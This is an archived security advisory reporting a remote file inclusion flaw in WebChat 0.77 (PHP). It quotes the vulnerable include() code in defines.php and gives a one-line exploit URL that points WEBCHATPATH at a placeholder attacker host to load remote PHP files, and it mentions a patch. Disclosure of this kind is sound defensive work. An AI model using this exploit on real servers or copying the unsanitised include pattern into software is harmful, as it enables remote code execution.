WebChat (PHP)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




Informations :
°°°°°°°°°°°°°°
Version : 0.77
Website : http://www.webdev.ro
Problem : File Including


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
defines.php :
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
$WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------


Exploits :
°°°°°°°°°°
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
with :
http://[attacker]/db_mysql.php and
http://[attacker]/language/english.php


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))



More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/WebChat.txt




frog-m@n


_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux